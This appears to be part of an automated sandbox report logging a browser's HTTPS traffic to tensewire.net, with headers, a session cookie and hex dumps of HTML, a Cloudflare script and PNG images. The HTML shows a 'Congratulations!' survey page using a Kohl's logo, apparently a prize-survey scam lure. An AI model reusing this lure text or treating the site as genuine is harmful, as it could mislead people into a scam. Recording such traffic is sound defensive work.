                              2024-04-25 18:22:13 UTC1369INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 2d 66 6f 6f 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6e 74 69 6e 75 65 20 62 75 74 74 6f 6e 20 62 74 6e 2d 74 78 20 62 68 2d 63 6f 6c 6f 72 20 62 74 78 68 2d 63 6f 6c 6f 72 20 73 75 72 76 65 79 5f 62 75 74 74 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 6e 43 6c 69 63 6b 3d 22 73 74 61 72 74 53 75 72 76 65 79 55 28 31 32 30 29 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 22 3e 53 74 61 72 74 20 53 75 72 76 65 79 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f
                              Data Ascii: </div> <div class="message-footer"> <button class="continue button btn-tx bh-color btxh-color survey_button" onClick="startSurveyU(120)" style="text-transform: uppercase;">Start Survey</button> </div> </
                              2024-04-25 18:22:13 UTC193INData Raw: 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 71 75 65 73 74 69 6f 6e 42 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 61 6c 69 64 61 74 65 5f 73 20 68 69 64 64 65 6e 20 6c 6f 61 64 5f 62 6c 6f 63 6b 22 3e 0a 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 30 22 3e 0d 0a
                              Data Ascii: <div id="questionBody"> </div> </div> </div> </div> <div class="validate_s hidden load_block"><div style="padding: 20px; padding-bottom: 0">
                              2024-04-25 18:22:13 UTC1369INData Raw: 37 66 66 61 0d 0a 43 6f 6e 67 72 61 74 75 6c 61 74 69 6f 6e 73 21 09 09 09 3c 64 69 76 20 69 64 3d 22 70 65 72 63 65 6e 74 5f 73 22 3e 30 25 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 67 72 65 73 73 20 6d 74 2d 33 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 70 78 22 3e 0a 09 09 09 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 67 72 65 73 73 2d 62 61 72 20 70 62 5f 70 72 6f 63 65 73 73 20 66 72 6f 6e 74 2d 70 72 6f 67 72 65 73 73 22 20 72 6f 6c 65 3d 22 70 72 6f 67 72 65 73 73 62 61 72 22 20 61 72 69 61 2d 76 61 6c 75 65 6e 6f 77 3d 22 30 22 20 61 72 69 61 2d 76 61 6c 75 65 6d 69 6e 3d 22 30 22 20 61 72 69 61 2d 76 61 6c 75 65 6d 61 78 3d 22 31 30 30 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a
                              Data Ascii: 7ffaCongratulations!<div id="percent_s">0%</div><div class="progress mt-3" style="height: 10px"> <div class="progress-bar pb_process front-progress" role="progressbar" aria-valuenow="0" aria-valuemin="0" aria-valuemax="100"></div></div>
                              2024-04-25 18:22:13 UTC1369INData Raw: 74 2d 63 65 6e 74 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 63 61 72 6f 75 73 65 6c 50 72 6f 64 75 63 74 73 22 20 63 6c 61 73 73 3d 22 63 61 72 6f 75 73 65 6c 20 73 6c 69 64 65 20 72 6f 77 22 20 64 61 74 61 2d 72 69 64 65 3d 22 63 61 72 6f 75 73 65 6c 22 3e 0a 09 09 09 09 09 20 20 3c 6f 6c 20 63 6c 61 73 73 3d 22 63 61 72 6f 75 73 65 6c 2d 69 6e 64 69 63 61 74 6f 72 73 20 63 6f 6c 2d 73 6d 2d 32 20 63 6f 6c 2d 31 32 20 6f 72 64 65 72 2d 73 6d 2d 31 20 6f 72 64 65 72 2d 32 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 20 30 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 22 3e 0a 09 09 09 09 09 09 20 20 09 09 09 09 09 09 09 09 3c 6c 69 20 73 74 79 6c 65 3d 22 62 61 63 6b 67
                              Data Ascii: t-center"><div id="carouselProducts" class="carousel slide row" data-ride="carousel"> <ol class="carousel-indicators col-sm-2 col-12 order-sm-1 order-2" style="margin: 0; position: relative; display: block; "> <li style="backg


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.449754104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:13 UTC657OUTGET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:13 UTC742INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:13 GMT
                              Content-Type: application/javascript
                              Content-Length: 1239
                              Connection: close
                              Last-Modified: Fri, 19 Apr 2024 20:54:07 GMT
                              ETag: "6622d9ef-4d7"
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Py5Axxu1bsAPFXaNh%2FlcN8RN5ptoXjPZynw3B20Tkpt96GqoIDXLs3TQsd0W5x9uagEjCoyPVd6VL7eX4l3wkgiReF8gPPhaMEQYdG3677pZav3Ygw%2BMCCMwMk6lFjk2"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b782cd0452f-ATL
                              X-Frame-Options: DENY
                              X-Content-Type-Options: nosniff
                              Expires: Sat, 27 Apr 2024 18:22:13 GMT
                              Cache-Control: max-age=172800
                              Cache-Control: public
                              Accept-Ranges: bytes
                              2024-04-25 18:22:13 UTC627INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 72 79 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 29 72 65 74 75 72 6e 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 61 20 68 72 65 66 3d 22 27 2b 65 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2b 27 22 3e 3c 2f 61 3e 27 2c 64 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66
                              Data Ascii: !function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href
                              2024-04-25 18:22:13 UTC612INData Raw: 74 68 29 29 7d 63 61 74 63 68 28 69 29 7b 65 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 63 3d 30 3b 63 3c 72 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 74 72 79 7b 76 61 72 20 6f 3d 72 5b 63 5d 2c 61 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 69 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 66 29 3b 69 66 28 69 29 7b 76 61 72 20 6c 3d 6e 28 69 2c 30 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6c 29 3b 61 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 64 2c 6f 29 7d 7d 63 61 74 63 68 28 68 29 7b 65 28 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63
                              Data Ascii: th))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelec


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.449755104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:13 UTC704OUTGET /uploads/archive/product/697/images/messmaster.png HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:13 UTC833INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:13 GMT
                              Content-Type: image/png
                              Content-Length: 100908
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 10:24:24 GMT
                              last-modified: Mon, 22 Apr 2024 19:29:16 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 201469
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mE5pOP60%2Bylp7RNYqv%2BA6n8DQGMs8hiKYoobJbr1y4TiMlSvnmDXdKEZyWDd5fDdtoPryJqqSx%2FlE7ccPJ8%2FNvuShH5DykuIjUnZFmTDq%2F8OdmeqvaeoIBPG9owx0Anm"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b7838da44d6-ATL
                              2024-04-25 18:22:13 UTC536INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 75 08 06 00 00 00 c6 36 bc fd 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 20 00 49 44 41 54 78 da ec bd 69 b0 25 e9 59 26 f6 bc ef f7 7d 99 79 f2 2c 77 a9 5b d5 dd d5 ad 56 4b 34 2d 09 a4 16 23 06 c5 98 11 84 34 c6 58 e3 f0 f6 c3 1e 0c e3 08 c6 78 c2 3f cc 36 8e b1 8d f9 31 01 fe c1 38 1c 63 88 c0 60 0f 61 62 70 cc 60 63 18 5b c0 30 01 31 06 44 08 a6 c1 92 00 85 d4 6a f5 a2 de 4a d5 d5 d5 b7 ee 7a d6 5c bf c5 3f 32 bf bc 79 4e 9d 53 75 ab ba 5b ea ea ce 37 ea d4 bd f7 ac 79 72 79 9f ef 79 de 0d e8 ac b3 ce 3a eb ac b3 ce 3a eb ac b3 ce 3a eb ac b3 ce 3a eb ac b3 ce 3a eb ac b3 ce 3a 7b fb 19 75 bb a0 b3 37 d3 be 7c 34 8d 25 14 0c 48 4f 59 16 df b9 2b bb 9d d2 59
                              Data Ascii: PNGIHDRu6pHYs+ IDATxi%Y&}y,w[VK4-#4Xx?618c`abp`c[01DjJz\?2yNSu[7yryy::::::{u7|4%HOY+Y
                              2024-04-25 18:22:13 UTC1369INData Raw: b3 b7 b4 e5 65 1e 3f 77 c2 3f fb e2 38 fb bb cf 9f cc e5 c1 c2 a0 d4 04 eb 00 29 1c 24 1c 40 0c 26 86 03 03 16 28 ac 85 d6 06 b0 0e 8a 80 5e 10 40 b2 00 31 81 42 01 c1 04 c9 04 41 0c 22 c0 b9 12 ce 96 60 67 c1 d0 20 67 c1 ce 60 10 2a f4 c8 4d 1d 89 df 27 e7 be da ef 29 3b ea 47 c7 2c c4 6f ef 0e a2 ab 5b 82 ad 18 02 c3 7a 5b b7 3a 50 e9 ac b3 0e 40 3a 7b eb d8 ab c7 a7 7f e7 e9 63 fa f9 a7 27 76 74 7d 51 60 51 10 a4 05 42 76 50 01 20 24 41 48 09 80 e1 1c a0 8d 83 71 06 5a 6b e4 79 89 b2 d0 b0 da c1 1a 07 67 4a 28 76 10 42 82 59 40 48 01 a9 02 48 29 21 85 80 94 02 92 1c a4 10 20 58 80 08 ce 01 04 0b 72 c6 0a a7 21 99 34 39 f7 94 24 73 25 92 64 63 25 10 2b c6 20 0e 6d 2f 10 d7 04 cc af 72 d8 3b 1a 46 12 3d 81 e2 a1 1e 1d 74 47 b1 b3 ce 3a 00 e9 ec eb 6c 13
                              Data Ascii: e?w?8)$@&(^@1BA"`g g`*M');G,o[z[:P@:{c'vt}Q`QBvP $AHqZkygJ(vBY@HH)! Xr!49$s%dc%+ m/r;F=tG:l
                              2024-04-25 18:22:13 UTC1369INData Raw: 60 c1 90 b2 72 ac 4a 05 10 55 c0 02 d6 59 58 63 61 8c 41 96 e7 48 d3 14 49 92 a0 2c 4b 08 21 aa 53 b2 2e 34 64 16 70 ce 56 71 12 cb 28 2d 50 72 88 12 02 da 09 38 19 42 f6 77 31 d8 da 41 10 8f 20 a2 21 38 8c c0 22 06 8b 18 96 18 10 0a 69 59 a0 b4 0e c6 5a 08 07 08 29 60 6d 15 a6 60 66 38 a3 c1 40 1d 6c 71 60 16 0d a1 21 ae b4 34 aa 65 2b aa 7e 81 ad 63 2f 4c d5 63 52 70 5d bb 92 43 29 05 a5 42 84 41 08 25 14 a4 60 f4 94 ab 24 b1 5a 1e 23 00 8e 1c d8 69 30 59 48 18 48 b2 e8 29 91 08 a6 cf f7 85 db ef 45 12 71 20 74 18 f0 bf 08 58 7c 26 8c 7b c5 6e 8f d0 93 04 01 58 05 68 49 94 75 67 63 67 df 28 eb 82 e8 9d dd 95 39 e7 90 a5 a9 24 b8 2a 5d 16 55 c6 94 03 60 9d ab d8 46 6b 8d e2 5a 6b 16 ff 1c 57 df 96 56 34 54 bd b7 b3 06 c6 5a 38 e7 a0 60 11 90 81 15 0c 83
                              Data Ascii: `rJUYXcaAHI,K!S.4dpVq(-Pr8Bw1A !8"iYZ)`m`f8@lq`!4e+~c/LcRp]C)BA%`$Z#i0YHH)Eq tX|&{nXhIugcg(9$*]U`FkZkWV4TZ8`
                              2024-04-25 18:22:13 UTC1369INData Raw: ed 4b 91 31 d1 ff f3 cf bf 78 f0 07 3b 11 f4 56 1c 60 6b d8 43 1c 2a 1b 05 54 f4 aa ba 96 eb dd d5 d0 01 48 67 9d dd a9 69 2f 47 f9 9f 5e 9a f2 20 60 8c a9 33 ab 70 4b 16 d2 be 7f f5 7d 00 0f 18 b2 fe dd bf be ba 39 50 95 41 e5 19 89 d5 70 15 4d 69 9e c1 0e 60 c7 b0 da c1 59 82 35 95 e4 05 10 ac 75 b0 16 30 0e 28 8d 85 63 82 81 43 69 0c 48 04 30 96 61 34 a0 48 40 39 8b 08 16 4a a7 10 fa 14 43 9e 61 64 0e ec 65 15 63 3a 9d d9 d9 7c 86 07 46 ef e1 a7 9f 7d 1e ef 7b ec 83 b8 fa cc 0d e4 fd 6d 18 96 98 3b 85 9d bd fb e1 b8 07 d9 db 42 10 8f 40 22 44 38 e8 83 45 00 03 20 33 16 20 05 6d 4c 1d 5b 72 00 0c 00 6a 00 c4 90 03 5b ae 81 b3 22 5f 15 a3 a9 0a 24 89 2c 40 1a 44 39 08 c0 0c 61 0d 44 80 a8 a5 30 29 19 22 40 15 7b 51 75 7d 8b 92 08 14 23 86 93 82 cd 9e 60
                              Data Ascii: K1x;V`kC*THgi/G^ `3pK}9PApMi`Y5u0(cCiH0a4H@9JCadec:|F}{m;B@"D8E 3 mL[rj["_$,@D9aD0)"@{Qu}#`
                              2024-04-25 18:22:13 UTC1369INData Raw: 84 d2 4a 58 08 14 65 59 75 36 76 0e 2c 04 bc 44 49 24 aa 1e 62 55 6a 1b b8 ee 19 a6 49 23 f3 59 d5 48 c0 a2 6a ad 8f ba d6 c5 67 85 55 fd c4 9a ee 04 2c 25 0d 94 a0 81 64 07 e6 12 c2 65 50 ce 42 0a 87 50 f2 c3 91 12 ff 6e 3f 0a ac 73 ee ab f7 ed f4 3e f5 e2 c9 e2 33 ef dd 89 bf 40 44 ba bb b2 3a 00 e9 ec 1d 06 22 b7 02 8e 75 35 22 9b 00 c4 3f 6e 8c 41 59 96 37 81 88 bf cf bf 2f 33 63 b1 58 60 30 18 60 36 9b 35 12 56 92 24 20 a2 e6 3e e7 1c 66 b3 19 ac b5 8d b4 65 ad 45 92 24 10 42 60 3e 9f 63 b1 58 34 40 c2 cc 0d 03 02 00 6d 2a 16 52 3a 83 a4 c8 60 1c b0 48 73 14 85 41 51 94 d0 f9 18 a6 dc 46 91 8f 91 e7 13 80 72 64 d9 a4 8a ad 38 03 67 35 98 0c 60 4b 38 6b 91 71 8c 04 01 b4 88 50 92 82 a5 00 d6 01 44 1a 64 73 b0 cd 10 72 81 80 52 0c 55 81 1d 77 82 07 83
                              Data Ascii: JXeYu6v,DI$bUjI#YHjgU,%dePBPn?s>3@D:"u5"?nAY7/3cX`0`65V$ >feE$B`>cX4@m*R:`HsAQFrd8g5`K8kqPDdsrRUw
                              2024-04-25 18:22:13 UTC1369INData Raw: 20 d6 56 23 06 5d 3d 6a 63 95 35 78 26 d0 4e e1 5d 65 20 eb 80 a2 9d 26 db 7e 2f 9f 71 d5 06 12 9f 19 e5 01 c4 b3 13 0f 58 fe f9 79 9e 03 00 f2 3c 6f 40 c5 b3 0a 0f 0c 41 10 34 ce d8 33 06 9f bd 35 9b cd 30 18 0c 30 1e 8f 1b 26 34 9b cd 30 1c 0e 31 1e 8f 1b b0 98 4e a7 b8 78 f1 62 23 97 cd e7 73 a4 69 8a b2 2c b1 58 2c a0 94 c2 78 3c 86 73 ae 61 30 fe bd bc 54 06 a0 01 81 bc 6e 79 3f 1c 0e 91 24 09 a2 28 6a 62 31 9e 6d f9 ef ec bf bf 07 0d 0f 42 3e 51 c0 27 09 2c 16 0b 58 63 50 14 39 98 08 ba 2c 01 b8 aa a8 92 42 68 57 b5 ce 67 21 60 a1 41 6c 61 75 82 50 18 c0 2c 10 2b 0b 85 14 83 c0 62 c8 37 70 41 59 30 cd 30 a0 14 31 69 14 e3 ab e8 07 7d 1c 5f 9d 62 77 ef 7e bc 7a 34 c1 68 7b 0f 8b b4 40 7f eb 5d b0 14 a2 3f dc 42 d8 1b 42 84 3d 04 51 1f 56 45 28 89 e0
                              Data Ascii: V#]=jc5x&N]e &~/qXy<o@A43500&401Nxb#si,X,x<sa0Tny?$(jb1mB>Q',XcP9,BhWg!`AlauP,+b7pAY001i}_bw~z4h{@]?BB=QVE(
                              2024-04-25 18:22:13 UTC1369INData Raw: 67 24 c6 98 25 d9 4b 08 d1 00 8a 8f d1 78 86 e2 41 ac ca 34 cb 97 d8 49 59 96 28 75 c5 5a 8a 3a 55 3a cf f3 3a e6 52 d7 bc e8 4a 1e 5b 2c 16 10 82 91 d7 55 fd 15 db 31 c8 0b 5f 47 a3 91 a6 09 b2 2c 43 92 24 0d ab 4b d3 04 ce 59 28 25 21 04 83 d9 37 cc 14 d5 2c 95 a6 67 9a 85 b1 1a ce 1a 10 2c 24 03 ba 48 eb 9e cb 9d ef ea 24 ac ce ee 65 b3 cc 6c 37 49 50 b7 0a 90 af 82 c6 a6 94 5e 22 aa 9a 1f 96 65 d5 a6 dd 07 e5 ab d1 b9 e3 9d dd ed ff e3 db 3f f2 91 57 8e 8e 8e f8 a5 97 5e c2 cb 2f bf 2c 2f 5e bc f8 a1 87 1e 7a e8 e3 ce b9 ed c3 c3 43 b9 bb bb cb c7 c7 c7 d0 5a 63 77 77 17 c7 c7 c7 08 82 00 83 c1 00 87 87 87 d8 da da 6a 8a 08 f7 f6 f6 9a 98 c4 ce ce 4e 53 ad ee 03 ea c3 e1 b0 89 21 44 51 d4 c4 43 3c 1b db de de c6 64 32 41 10 04 d0 a5 46 59 94 90 42 22
                              Data Ascii: g$%KxA4IY(uZ:U::RJ[,U1_G,C$KY(%!7,g,$H$el7IP^"e?W^/,/^zCZcwwjNS!DQC<d2AFYB"
                              2024-04-25 18:22:13 UTC1369INData Raw: 56 27 12 02 b8 69 32 61 9b 7d ac 63 23 6d 79 ab 72 1a 0e e4 1c 04 18 a5 75 d7 1f 79 f8 dd bf ff de f7 be f7 4d 59 85 52 d5 36 7c 7e 8b a7 fc f3 fa b6 64 69 96 71 91 e5 0f 5d bf fe ea c7 ae bd fa ea f6 4b 2f be c8 5f 7d fe 79 7c e5 2b 5f c1 c1 c1 01 16 8b c5 03 c3 e1 f0 6f 48 29 bf 6d 32 99 04 60 81 79 9d 59 25 48 e2 f4 78 8c 38 ee f3 e9 f1 04 61 18 20 0c 23 cc 67 0b 5c dc bb 84 24 49 30 1a 6c d5 4d 1c 1d a2 5e 8c c9 78 8c 4b 17 2f 60 3a 9d 62 30 88 a1 4b 0d c0 22 54 21 d2 34 45 18 45 98 4e c7 d8 d9 d9 69 00 a6 2c 32 48 41 30 ba 00 b3 43 51 a6 60 01 e4 65 0a 6d 34 50 5a e8 f2 ac f3 b0 af 7e 8f 7a bd 2a fd 39 8e 9b da 9a 93 93 93 a6 2d cc f6 f6 36 8e 8f 8f 31 1a 8d 9a 1e 63 55 1c a7 4a 87 8e a2 08 79 9e e3 e4 e4 a4 9a 51 52 d7 a9 30 33 84 10 0d 98 d4 00 8f
                              Data Ascii: V'i2a}c#myruyMYR6|~diq]K/_}y|+_oH)m2`yY%Hx8a #g\$I0lM^xK/`:b0K"T!4EENi,2HA0CQ`em4PZ~z*9-61cUJyQR03
                              2024-04-25 18:22:13 UTC1369INData Raw: d7 5e c1 9f fe e9 9f c9 6f fb b6 bf f2 de 7e bf ff 1f 9c 9c 9c ec ed ef ef 47 7f f1 17 7f fe b1 57 5e b9 76 a9 a0 aa ef 96 35 75 bd 87 75 70 b0 00 2d d7 79 ac 63 a3 fe 5c d0 5a 23 0c 54 95 85 07 0b a3 0b ec ee 6e 7f ae d7 8b e6 dd 91 eb 00 a4 b3 7b 1c 40 fc c8 d8 2a 65 f7 e6 4c aa 75 c1 f3 76 56 d6 ba 66 8b eb 8a 09 ad b5 20 34 ef 3b e8 f6 fe d7 95 bd 24 00 92 4d 8f ff e6 6f fe d6 15 e7 dc 67 fc 69 f1 8b bf f8 8b ff e5 2f fc c2 2f fc cc 7c 3e 1f cc 66 b3 46 c6 6a e4 cb 56 57 02 7f 0e ad ca a1 fe bc 28 b5 86 75 16 8c b3 d7 ec ed ed 55 f9 ca 9d 75 00 d2 d9 bd 0f 20 d6 5a 38 5b b5 de 68 4b 58 6d 70 68 b7 a4 58 17 37 59 5d 79 ae 9d 89 5e 07 d1 9d 73 72 53 eb 94 ce be 61 20 e3 1d ba d5 5a ff 6f 4f 3c f1 c4 77 7d ee 73 9f fb 8f fc 2c 95 76 8d c7 aa 94 e9 cf a3
                              Data Ascii: ^o~GW^v5uup-yc\Z#Tn{@*eLuvVf 4;$Mogi//|>fFjVW(uUu Z8[hKXmphX7Y]y^srSa ZoO<w}s,v
                              2024-04-25 18:22:13 UTC1369INData Raw: 91 06 90 80 28 61 42 41 44 96 59 58 bf b2 ae d8 14 83 59 34 45 70 42 78 70 f2 73 2d 2a f0 54 42 6a 21 f8 6a 96 e5 ff e2 a7 7e ea a7 5f 00 a0 ab 99 18 21 94 aa 40 67 6b 6b 0b 83 c1 00 71 1c 43 4a 69 c3 30 b4 04 ec e7 85 be f2 89 4f 7c f7 3d a5 fd 97 79 61 8b ac a8 7a 99 69 5d b5 23 b1 0e cc cb e3 69 3d 58 78 d6 ea ff 6e 67 da b5 ba 13 8c b1 a1 29 64 67 1d 80 74 f6 06 81 03 00 ae 2f c4 88 99 bf d7 39 77 39 cf 33 9e 4e 26 98 4d 67 fc 17 9f ff 7c 90 a4 c9 03 16 fc 7e 63 ec e3 8b c5 62 37 49 12 59 cf f6 6e e4 a8 2c 4b b9 2c 4a 14 45 c1 79 91 73 59 96 30 da 20 cf f3 66 a5 58 d6 55 e2 c6 56 c0 e0 ea d4 19 db 80 82 83 b3 cb b3 ad 57 b6 f5 6c 35 4a 95 cf f7 be bf f9 cd 91 e7 12 cb b0 f2 7a a4 0c a2 b3 77 74 0e b0 66 e9 3d 89 88 89 28 b0 d6 06 cc bc bd 2c ab 2c b7
                              Data Ascii: (aBADYXY4EpBxps-*TBj!j~_!@gkkqCJi0O|=yazi]#i=Xxng)dgt/9w93N&Mg|~cb7IYn,K,JEysY0 fXUVWl5Jzwtf=(,,


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.449756104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:13 UTC710OUTGET /uploads/archive/company/55/images/kohls-logo-purple.png HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:13 UTC827INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:13 GMT
                              Content-Type: image/png
                              Content-Length: 8332
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 10:24:24 GMT
                              last-modified: Tue, 04 May 2021 18:30:29 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 201469
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pJWW4XYouJF9DdvYnIKxvE9fwpFDJXf9erz6U2pxOnG8Gb5zwBawsf1kL0YSEWIjRZYjV0DSVT%2Fs%2FiaAxR9DE%2B3OrDzLy4OAc3TATCjDr6HEmISaZ0hJjqfRObpZrhRT"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b783f3412e6-ATL
